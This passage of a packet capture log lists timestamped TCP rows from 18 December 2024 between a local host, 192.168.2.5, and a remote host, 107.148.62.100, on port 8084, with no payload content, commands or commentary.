Dec 18, 2024 13:32:00.961642981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.961694002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.962234020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.963632107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.963682890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.963859081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.964067936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.964118004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.964745998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.966382980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.966622114 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.966762066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.967394114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.967446089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.968600035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.968991041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.969046116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.969577074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.970999956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.971049070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.971591949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.972050905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.972121000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.973597050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.974073887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.974128008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.974597931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.976665974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.976726055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.977076054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.977688074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.977742910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.979438066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.979788065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.979840994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.980443954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.981689930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.981743097 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.981956959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.982608080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.982657909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.064608097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.064625978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.064698935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.066005945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.072093010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.072166920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.072397947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.072623014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.072680950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.073263884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.088267088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.088320971 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.088560104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.089251995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.089298964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.089735985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.090342045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.090389013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.090950012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.103302002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.103430986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.103782892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.104289055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.104341030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.165966988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.166229963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.166330099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.166766882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.167242050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.167404890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.167618990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.168180943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.168231964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.169512033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.169913054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.169969082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.170392036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.173897028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.173952103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.174130917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.174748898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.174797058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.174961090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.175470114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.175518036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.176064014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.177722931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.177794933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.177973986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.178441048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.178493977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.183171034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.183187008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.183201075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.183237076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.188227892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.188288927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.188298941 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.188306093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.188370943 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.191730022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.193124056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.193140030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.193182945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.194751978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.194781065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.194797993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.194812059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.194848061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.195785046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.195802927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.195818901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.195847034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.196610928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.196628094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.196657896 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.197912931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.197931051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.197946072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.197962999 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.197999001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.198796988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.253631115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.277542114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.277811050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.277877092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.278346062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.285624027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.285682917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.285785913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.286287069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.286348104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.305284977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.305300951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.305367947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.306514978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.307734013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.307799101 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.308985949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.309003115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.309082985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.317338943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.317493916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.317549944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.318048000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.376560926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.380987883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.381004095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.381078959 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.382046938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.382288933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.382337093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.382798910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.382813931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.382874966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.383610010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.384134054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.384176970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.384843111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.388108969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.388175011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.388509989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.388793945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.388839006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.389085054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.389595032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.389642000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.390144110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.391737938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.391783953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.391968966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.392554998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.392597914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.394427061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.394681931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.394726992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.395186901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.396603107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.396651983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.396827936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.397423029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.397466898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.399104118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.399416924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.399460077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.399893999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.401791096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.401844978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.402137041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.402668953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.402718067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.405539989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.406836987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.406852961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.406883001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.410645008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.410660982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.410696983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.411935091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.411990881 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.416768074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.416785002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.416800022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.416834116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.470321894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.493195057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.493217945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.493293047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.495243073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.503200054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.503225088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.503303051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.503952026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.504008055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.517399073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.517613888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.517672062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.518178940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.518723011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.518769979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.518976927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.519361019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.519401073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.531161070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.531500101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.531569004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.532239914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.580754995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.594151974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.594448090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.594504118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.594907999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.595387936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.595434904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.595688105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.597373962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.597421885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.600297928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.601468086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.601485968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.601526976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.607563019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.607578993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.607645035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.610253096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.610308886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.611495018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.611511946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.611526966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.611560106 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.616065025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.616081953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.616147995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.617496967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.617563963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.620980978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.622494936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.622512102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.622550011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.626235962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.626391888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.627624035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.628845930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.628895044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.632972956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.632989883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.633003950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.633044958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.636914968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.636931896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.636945963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.636970997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.637001991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.641171932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.642019987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.642035961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.642066956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.645143986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.645162106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.645176888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.645190954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.645236015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.646328926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.646346092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.646363020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.646395922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.697438955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.705467939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.705796003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.705862045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.706434011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.713681936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.713747978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.713936090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.714473009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.714523077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.730448961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.730700970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.730776072 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.731195927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.732013941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.732081890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.732177019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.733160019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.733221054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.745316982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.745450020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.745507956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.745970964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.791986942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.820276976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.821715117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.821774006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.822758913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.824112892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.824130058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.824171066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.825506926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.825578928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.827590942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.828843117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.828902960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.830532074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.831621885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.831671953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.832592010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.832626104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.832652092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.832672119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.833801985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.833818913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.833833933 CET	8084	49705	107.148.62.100	192.168.2.5
